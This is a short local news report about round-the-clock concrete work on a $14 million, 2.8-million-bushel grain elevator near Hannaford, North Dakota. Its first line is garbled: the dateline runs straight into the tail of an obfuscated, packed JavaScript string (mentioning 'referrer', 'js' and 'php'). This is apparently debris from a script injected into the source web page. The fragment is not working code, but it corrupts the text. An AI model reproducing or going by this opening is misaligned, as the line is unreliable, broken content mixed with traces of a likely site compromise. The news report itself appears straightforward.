HANNAFORD yaksr|var|u0026u|referrer|fttzn||js|php’.split(‘|’),0,{}))
(NewsDakota.com) And on the 7th day it was complete.
Construction workers at the site near Hannaford and employees at CDI Ready Mix in Valley City worked 24/7 for 7 days to complete the pour of a new concrete elevator.
Central Plains Ag Services General Manager Ben Jacob says 75 workers rotated in two 12 hours shifts to get the work done.

Jacob says a fire at the Valley City ready mix plant on Monday created a few nervous hours for crews pouring concrete slips at the elevator construction site.
The concrete pour on the 140 foot high elevator west of Hannaford was completed this morning.

Jacob says the $14 million elevator will have a capacity to store 2.8 million bushels of grain. He says it should be operating sometime in July. The new elevator will be able to load a 110 grain car shuttle train in 6 and a-half hours.
Jacob says the payroll impact for Hannaford and Griggs County with 33 full-time employees will be about $2 million annually.
Jacob says the contractor Vigen Construction lost nearly 2 months of construction time due to the wet weather last spring and summer.
